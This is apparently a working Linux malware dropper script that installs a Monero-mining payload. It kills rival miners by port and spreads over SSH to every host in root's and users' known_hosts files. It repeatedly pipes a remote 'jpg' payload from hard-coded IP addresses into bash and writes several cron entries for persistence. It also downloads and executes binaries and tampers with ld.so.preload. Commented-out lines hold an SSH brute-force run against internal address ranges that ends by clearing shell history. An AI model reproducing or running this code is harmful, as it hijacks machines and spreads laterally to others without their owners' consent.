#!/bin/bash
pkill xmp
pkill config.json
netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9

if [ $(ping -c 1 pool.supportxmr.com 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];
then
        dns=""
else
        dns="-d"
fi

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL http://107.189.11.170/2start.jpg||wget -q -O- http://107.189.11.170/2start.jpg)|bash -sh >/dev/null 2>&1 &' & done
fi

for file in /home/*
do
    if test -d $file
    then
        if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
            for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL http://107.189.11.170/2start.jpg||wget -q -O- http://107.189.11.170/2start.jpg)|bash -sh >/dev/null 2>&1 &' & done
        fi
    fi
done

echo -e "*/1 * * * * root (curl -s http://107.189.11.170/2start.jpg||wget -q -O - http://107.189.11.170/2start.jpg)|bash -sh\n##" > /etc/cron.d/root
echo -e "*/2 * * * * root (curl -s http://107.189.11.170/2start.jpg||wget -q -O - http://107.189.11.170/2start.jpg)|bash -sh\n##" > /etc/cron.d/apache
echo -e "*/3 * * * * root lwp-download http://107.189.11.170/2start.jpg /tmp/.xo; bash /tmp/.xo; rm -rf /tmp.xo\n##" > /etc/cron.d/nginx
echo -e "*/30 * * * *	(curl -s http://107.189.11.170/2start.jpg||wget -q -O - http://107.189.11.170/2start.jpg)|bash -sh\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* * * * *	(curl -s http://107.189.11.170/2start.jpg||wget -q -O - http://107.189.11.170/2start.jpg)|bash -sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
(curl -fsSL --connect-timeout 120 http://107.189.11.170/11 -o /etc/cron.hourly/oanacroner1||wget http://107.189.11.170/11 -O /etc/cron.hourly/oanacroner1) && chmod 755 /etc/cron.hourly/oanacroner1
DIR="/tmp"
cd $DIR
#curl -s http://107.189.11.170/go3 | bash -sh || wget -q -O - http://107.189.11.170/go3 | bash -sh
#lwp-download http://107.189.11.170/go3 /tmp/go3; bash /tmp/go3
#curl -s http://107.189.11.170/go4 | bash -sh || wget -q -O - http://107.189.11.170/go4 | bash -sh
#lwp-download http://107.189.11.170/go3 /tmp/go4; bash /tmp/go4

if [ -a "/tmp/.sh/x86_64" ]
then
    if [ -w "/tmp/.sh/x86_64" ] && [ ! -d "/tmp/.sh/x86_64" ]
    then
        if [ -x "$(command -v md5sum)" ]
        then
            sum=$(md5sum /tmp/.sh/x86_64 | awk '{ print $1 }')
            echo $sum
            case $sum in
                9fe932ac3055045a46d44997a4c6d481 | 9fe932ac3055045a46d44997a4c6d481)
                    echo "sssus OK"
                ;;
                *)
                    echo "sssus wrong"
                    rm -rf /usr/local/lib/libkk.so
                    echo "" > /etc/ld.so.preload
                    pkill -f wc.conf
                    pkill -f sssus
                    sleep 4
                ;;
            esac
        fi
        echo "P OK"
    else
        DIR=$(mktemp -d)/tmp
        mkdir $DIR
        echo "T DIR $DIR"
    fi
else
    if [ -d "/tmp" ]
    then
        DIR="/tmp"
    fi
    echo "P NOT EXISTS"
fi
if [ -d "/tmp/.sh/x86_64" ]
then
    DIR=$(mktemp -d)/tmp
    mkdir $DIR
    echo "T DIR $DIR"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ];
then
    WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
then
    WGET="wget -O";
fi
if [ -s /usr/bin/wget2 ];
then
    WGET="wget2 -O";
fi
if [ -s /usr/bin/curl2 ];
then
    WGET="curl2 -o";
fi

f2="107.189.11.170"

downloadIfNeed()
{
    if [ -x "$(command -v md5sum)" ]
    then
        if [ ! -f $DIR/x86_64 ]; then
            echo "File not found!"
            download
        fi
        sum=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
        echo $sum
        case $sum in
            9fe932ac3055045a46d44997a4c6d481 | 9fe932ac3055045a46d44997a4c6d481)
                echo "x86_64 OK"
            ;;
            *)
                echo "sssus wrong"
                sizeBefore=$(du $DIR/x86_64)
                if [ -s /usr/bin/curl ];
                then
                    WGET="curl -k -o ";
                fi
                if [ -s /usr/bin/wget ];
                then
                    WGET="wget --no-check-certificate -O ";
                fi
                download
                sumAfter=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
                if [ -s /usr/bin/curl ];
                then
                    echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sssus` > $DIR/tmp.txt
                fi
            ;;
        esac
    else
        echo "No md5sum"
        download
    fi
}


download() {
    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/x86_643 | awk '{ print $1 }')
        echo $sum
        case $sum in
            9fe932ac3055045a46d44997a4c6d481 | 9fe932ac3055045a46d44997a4c6d481)
                echo "x86_64 OK"
                cp $DIR/x86_643 $DIR/x86_64
				        cp $DIR/x86_643 $DIR/x86_64
            ;;
            *)
                echo "x86_64 wrong"
                download2
            ;;
        esac
    else
        echo "No md5sum"
        download2
    fi
}

download2() {
    if [ `getconf LONG_BIT` = "64" ]
    then
	$WGET "$DIR"/x86_64 http://104.244.74.248/x86_64
	$WGET "$DIR"/i686 http://104.244.75.25/i686
	$WGET "$DIR"/go http://107.189.11.170/go
	lwp-download http://104.244.74.248/x86_64 "$DIR"/x86_64
	lwp-download http://104.244.75.25/i686 "$DIR"/i686
	lwp-download http://107.189.11.170/go "$DIR"/go
    else
	$WGET "$DIR"/x86_64 http://104.244.74.248/x86_64
	$WGET "$DIR"/i686 http://104.244.75.25/i686
	$WGET "$DIR"/go http://107.189.11.170/go
	lwp-download http://104.244.74.248/x86_64 "$DIR"/x86_64
	lwp-download http://104.244.75.25/i686 "$DIR"/i686
	lwp-download http://107.189.11.170/go "$DIR"/go
    fi
    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
        echo $sum
        case $sum in
            9fe932ac3055045a46d44997a4c6d481 | 9fe932ac3055045a46d44997a4c6d481)
                echo "x86_64 OK"
                cp $DIR/x86_64 $DIR/x86_643
            ;;
            *)
                echo "sssus wrong"
            ;;
        esac
    else
        echo "No md5sum"
    fi
}

judge() {
    if [ ! "$(netstat -ant|grep '23.94.24.12:8080'|grep 'ESTABLISHED'|grep -v grep)" ];
    then
        ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid
	      do
	      kill -9 $procid
        done
        downloadIfNeed
        rm -rf /usr/local/lib/libkk.so
	$WGET "$DIR"/x86_64 http://104.244.74.248/x86_64
	$WGET "$DIR"/i686 http://104.244.75.25/i686
	$WGET "$DIR"/go http://107.189.11.170/go
	lwp-download http://104.244.74.248/x86_64 "$DIR"/x86_64
	lwp-download http://104.244.75.25/i686 "$DIR"/i686
	lwp-download http://107.189.11.170/go "$DIR"/go
	chmod +x $DIR/i686
        chmod +x $DIR/x86_64
	chmod +x $DIR/go
        $DIR/go	
        sleep 5
    else
	echo "Running"
    fi
}

judge2() {
    if [ ! "$(ps -fe|grep -e 'dbused'|grep -v grep)" ];
    then
        downloadIfNeed
	lwp-download http://104.244.74.248/x86_64 "$DIR"/x86_64
	lwp-download http://104.244.75.25/i686 "$DIR"/i686
	lwp-download http://107.189.11.170/go "$DIR"/go
	chmod +x $DIR/i686
        chmod +x $DIR/x86_64
	chmod +x $DIR/go
        $DIR/go	
        sleep 5
    else
	echo "Running"
    fi
}

if [ ! "$(netstat -ant|grep '23.94.24.12:8080'|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
then
    judge
else
    judge2
fi

#if [ ! "$(ps -fe|grep -e 'KynU98'|grep -v grep)" ];
#then
#	$WGET "$DIR"/hxx http://107.189.11.170/hxx
#	$WGET "$DIR"/p http://107.189.11.170/p
#	lwp-download http://107.189.11.170/hxx "$DIR"/hxx
#	lwp-download http://107.189.11.170/p "$DIR"/p
#        chmod +x $DIR/hxx
#	nohup $DIR/hxx 100 -b 192.168 p 22 "echo 'KynU98'; apt-get install wget -y; yum install wget -y; apt-get install curl -y; yum install curl -y; get -q -O - http://107.189.11.170/2start.jpg | bash -sh; url -fsSL http://107.189.11.170/2start.jpg | bash -sh; wget -q -O - http://107.189.11.170/2start.jpg | bash -sh; curl -fsSL http://107.189.11.170/2start.jpg | bash -sh; cur -fsSL http://107.189.11.170/2start.jpg | bash -sh; lwp-download http://107.189.11.170/2start.jpg /tmp/2start.jpg; bash /tmp/2start.jpg; rm -rf 2start.jpg; history -c" > /dev/null 2>&1 &
#	sleep 8m
#	nohup $DIR/hxx 100 -b 172.16 p 22 "echo 'KynU98'; apt-get install wget -y; yum install wget -y; apt-get install curl -y; yum install curl -y; get -q -O - http://107.189.11.170/2start.jpg | bash -sh; url -fsSL http://107.189.11.170/2start.jpg | bash -sh; wget -q -O - http://107.189.11.170/2start.jpg | bash -sh; curl -fsSL http://107.189.11.170/2start.jpg | bash -sh; cur -fsSL http://107.189.11.170/2start.jpg | bash -sh; lwp-download http://107.189.11.170/2start.jpg /tmp/2start.jpg; bash /tmp/2start.jpg; rm -rf 2start.jpg; history -c" > /dev/null 2>&1 &
#else
#    echo "Bruting"
#fi


if crontab -l | grep -q "107.189.11.170"
then
    echo "Cron exists"
else
    crontab -r
    echo "Cron not found"
    LDR="wget -q -O -"
    if [ -s /usr/bin/curl ];
    then
        LDR="curl";
    fi
    if [ -s /usr/bin/curl2 ];
    then
        LDR="curl2";
    fi
    if [ -s /usr/bin/wget ];
    then
        LDR="wget -q -O -";
    fi
    if [ -s /usr/bin/wget2 ];
    then
        LDR="wget2 -q -O -";
    fi
	(crontab -l 2>/dev/null; echo "* * * * * $LDR http://107.189.11.170/2start.jpg | bash -sh > /dev/null 2>&1")| crontab -
fi

rm -rf `pwd`/2start.jpg